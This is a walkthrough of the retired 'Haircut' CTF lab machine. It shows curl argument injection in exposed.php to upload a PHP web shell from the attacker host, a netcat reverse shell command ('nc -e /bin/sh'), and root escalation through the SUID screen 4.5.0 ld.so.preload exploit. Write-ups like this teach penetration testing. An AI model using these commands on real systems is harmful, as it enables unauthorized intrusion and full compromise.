Today we’re going to solve another CTF machine “Haircut”. It is now retired box and can be accessible if you’re a VIP member.
Introduction
Specifications
- Target OS: Linux
- Services: SSH, HTTP
- IP Address: 10.10.10.24
- Difficulty: Easy
Weakness
- Curl Command
- SUID Screen 4.5
Contents
- Getting user
- Getting root
Reconnaissance
As always, the first step consists of reconnaissance phase as port scanning.
Ports Scanning
During this step we’re gonna identify the target to see what we have behind the IP Address.
We just found these two ports opened after doing intense scan for TCP and UDP port scanning. So what do we next is enumerate running services.
Enumerate Directories
There’s different tools for directories enumerating but my favorite one is dirbuster.
Using lowercase medium wordlist we found and exposed.php file and upload directory.
Let’s take a look at exposed.php file.
There’s a input field where you can enter URL and press go let’s take a look what it dose.
Let’s take a look at the request and response in burp suite.
Request
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
POST /exposed.php HTTP/1.1 Host: 10.10.10.24 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.10.10.24/exposed.php DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 52 formurl=http://localhost/test.html&submit=Go |
Response
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Thu, 29 Nov 2018 19:05:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 1011 <html> <head> <title>Hairdresser checker</title> </head> <body> <form action='exposed.php' method='POST'> <span> <p> Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html </p> </span> <input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/> <input type='submit' name='submit' value='Go' id='submit' /> </form> <span> <p>Requesting Site...</p> % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 100 223 100 223 0 0 167k 0 --:--:-- --:--:-- --:--:-- 217k <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <body> <img src='carrie.jpg'></img> </body> </html> </span> </body> </html> |
I know that it is running curl command because of the structure of the response. But it also hints about curl inside carrie,jpg picture where it says CARRIE CURL.
We know what curl can do 🙂
Exploitation
We can use curl to upload our shell inside uploads directory which we found during enumerating directories.
Let’s create a php reverse shell 1337.php
1337.php
https://gist.github.com/sente/4dbb2b7bdda2647ba80b
Now we have to run python HTTP server to upload our 1337.php file through curl.
|
1 |
python -m SimpleHTTPServer |
Now we have to upload our shell inside upload directory. Since we know the default apache path /var/www/html/uploads let’s use curl parameter -o to output file 1337.php inside uploads directory.
|
1 |
-o /var/www/html/uploads/1337.php http://10.10.14.4:8000/1337.php |
Request
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
POST /exposed.php HTTP/1.1 Host: 10.10.10.24 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.10.10.24/exposed.php DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 103 formurl=-o /var/www/html/uploads/1337.php http://10.10.14.4:8000/1337.php&submit=Go |
Now our php shell is successfully uploaded inside uploads directory.
Let’s access our shell through browser or burp.
Request 1337.php?cmd=ls
|
1 2 3 4 5 6 7 8 9 10 |
GET /uploads/1337.php?cmd=ls HTTP/1.1 Host: 10.10.10.24 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 |
Response
|
1 2 3 4 5 6 7 8 9 10 |
HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Thu, 29 Nov 2018 20:24:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 31 <pre>1337.php bounce.jpg </pre> |
Now it’s time to get proper reverse shell using netcat.
|
1 2 3 4 5 6 7 8 9 10 |
GET /uploads/1337.php?cmd=nc -e /bin/sh 10.10.14.4 1337 HTTP/1.1 Host: 10.10.10.24 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 |
And we got shell.
Privilege Escalation
After getting user access we move forward by running some scripts which help us to go through some important information which can lead to root.
Before running scripts i do some manual research and testing so this time i found an uncommon SUID file.
The first thing i did is ran this command.
|
1 |
find / -perm -4000 2>/dev/null |
And found this uncommon file /usr/bin/screen-4.5.0 which we don’t see here. Upon doing google search we found an exploit.
GCC is broken on target machine so we have to compile them locally.
let’s compile.
|
1 |
gcc -fPIC -shared -ldl -o libhax.so libhax.c |
Let’s upload compiled c programs to our targeted machine inside /tmp.
Let’s move further.
|
1 2 3 4 5 6 7 8 |
www-data@haircut:/tmp$ cd /etc cd /etc www-data@haircut:/etc$ ls -la |grep ld ls -la |grep ld -rw-r--r-- 1 root root 24939 May 19 2017 ld.so.cache -rw-r--r-- 1 root root 34 Jan 27 2016 ld.so.conf drwxr-xr-x 2 root root 4096 May 16 2017 ld.so.conf.d drwxr-xr-x 2 root root 4096 May 15 2017 ldap |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
www-data@haircut:/etc$ umask 000 umask 000 www-data@haircut:/etc$ screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" <en -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" www-data@haircut:/etc$ screen -ls screen -ls ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. [+] done! No Sockets found in /tmp/screens/S-www-data. www-data@haircut:/etc$ /tmp/rootshell /tmp/rootshell # id id uid=0(root) gid=0(root) groups=0(root),33(www-data) |
